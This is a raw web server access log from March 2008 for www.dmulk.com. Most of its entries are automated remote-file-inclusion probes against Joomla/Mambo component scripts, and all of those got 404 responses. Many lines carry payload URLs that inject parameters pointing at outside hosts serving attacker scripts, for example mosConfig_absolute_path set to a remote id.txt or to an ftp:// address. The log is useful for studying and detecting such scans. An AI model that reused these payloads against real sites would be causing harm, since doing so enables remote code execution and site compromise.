84.40.17.23 - - [23/Mar/2008:06:00:10 -0700] "GET /logs//config.php?inc_dir=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:06:00:14 -0700] "GET /logs/access_080219.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:06:00:55 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.winiker.net/public_html/oneadmin/_files/puki.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.130.70 - - [23/Mar/2008:06:01:54 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:02:02 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:02:02 -0700] "GET /homepage.php?sel=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:02:02 -0700] "GET /logs/homepage.php?sel=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:06:02:11 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:06:02:12 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:06:02:13 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:02:25 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:06:02:31 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:06:02:44 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:06:02:45 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:02:58 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:02:59 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:06:02:59 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.246.175 - - [23/Mar/2008:06:03:25 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.246.175 - - [23/Mar/2008:06:03:26 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.246.175 - - [23/Mar/2008:06:03:26 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.246.175 - - [23/Mar/2008:06:03:31 -0700] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [23/Mar/2008:06:03:52 -0700] "GET /logs/access.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [23/Mar/2008:06:03:53 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.76.34 - - [23/Mar/2008:06:04:30 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.76.34 - - [23/Mar/2008:06:04:30 -0700] "GET /index1.php?menu=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.76.34 - - [23/Mar/2008:06:04:31 -0700] "GET /logs/index1.php?menu=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.76.34 - - [23/Mar/2008:06:04:39 -0700] "GET /logs/access_080207.log/index1.php?menu=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [23/Mar/2008:06:05:20 -0700] "GET /logs/access_080312.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:05:48 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:05:48 -0700] "GET /index2.php?x=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:05:48 -0700] "GET /logs/index2.php?x=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:06:06:54 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:07:16 -0700] "GET /logs/access_080216.log/homepage.php?sel=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.42 - - [23/Mar/2008:06:07:52 -0700] "GET /bikes/?S=D HTTP/1.0" 200 2304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:06:08:24 -0700] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:06:08:24 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:06:08:25 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:06:08:42 -0700] "GET /logs/access_080211.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [23/Mar/2008:06:08:48 -0700] "GET /logs/access_080204.log/index2.php?x=http://www.fonsvandenhout.nl/catalog/includes/mc22.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.253.51.34 - - [23/Mar/2008:06:08:55 -0700] "GET //comprofiler.php?mosConfig_lang=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:06:08:56 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.253.51.34 - - [23/Mar/2008:06:09:04 -0700] "GET /logs//comprofiler.php?mosConfig_lang=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:06:09:16 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:06:09:21 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:06:09:31 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.205.15.135 - - [23/Mar/2008:06:09:55 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.15.135 - - [23/Mar/2008:06:09:55 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.15.135 - - [23/Mar/2008:06:09:55 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:06:09:57 -0700] "GET /logs/access_080313.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:06:09:59 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:06:10:00 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:06:10:06 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:06:10:06 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:06:10:07 -0700] "GET /homepage.php?sel=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:06:10:07 -0700] "GET /logs/homepage.php?sel=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:06:10:18 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.15.135 - - [23/Mar/2008:06:10:48 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.223.44 - - [23/Mar/2008:06:11:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.193.223.44 - - [23/Mar/2008:06:11:12 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
213.202.247.246 - - [23/Mar/2008:06:11:16 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.202.247.246 - - [23/Mar/2008:06:11:16 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:06:11:57 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.111 - - [23/Mar/2008:06:11:57 -0700] "GET /logs/access_070807.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.2.130 - - [23/Mar/2008:06:12:22 -0700] "GET /logs/access.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [23/Mar/2008:06:12:22 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:06:12:33 -0700] "GET /logs/access_080131.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:06:12:33 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:06:12:50 -0700] "GET /logs/access_080127.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:06:12:50 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:06:12:51 -0700] "GET /logs/access_080131.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.24.50.200 - - [23/Mar/2008:06:12:52 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
217.24.50.200 - - [23/Mar/2008:06:12:53 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:06:12:55 -0700] "GET /logs/access_080131.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:06:12:55 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:06:12:55 -0700] "GET /logs/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:06:12:58 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:06:13:00 -0700] "GET /logs/access_080127.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:13:01 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:13:01 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:06:13:50 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:06:13:52 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:06:13:53 -0700] "GET /logs/access_080127.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.110 - - [23/Mar/2008:06:14:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:06:14:21 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:06:14:39 -0700] "GET /logs/access_080131.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:06:14:40 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:06:14:40 -0700] "GET /logs/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:06:14:41 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:06:14:45 -0700] "GET /logs/access_080306.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:06:14:47 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.35.95.235 - - [23/Mar/2008:06:14:49 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.36.235.74 - - [23/Mar/2008:06:14:52 -0700] "GET /logs/access.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [23/Mar/2008:06:14:52 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [23/Mar/2008:06:14:57 -0700] "GET /logs/access_080312.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:15 -0700] "GET /logs/access_080131.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:06:15:28 -0700] "GET /logs/access_080131.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:06:15:28 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [23/Mar/2008:06:15:29 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:35 -0700] "GET /logs/access_080131.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:35 -0700] "GET /logs/access_080131.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:35 -0700] "GET /logs/access_080131.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:06:15:35 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:36 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:36 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:36 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:37 -0700] "GET /logs/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:37 -0700] "GET /logs/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:37 -0700] "GET /logs/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:40 -0700] "GET /logs/access_080131.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:40 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:41 -0700] "GET /logs/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:45 -0700] "GET /logs/access_080131.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.122.239 - - [23/Mar/2008:06:15:46 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.122.239 - - [23/Mar/2008:06:15:46 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.122.239 - - [23/Mar/2008:06:15:46 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:46 -0700] "GET /scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:06:15:46 -0700] "GET /logs/access_080127.log/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:06:15:47 -0700] "GET /logs/scanhttp://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.169.50 - - [23/Mar/2008:06:15:53 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.169.50 - - [23/Mar/2008:06:15:53 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
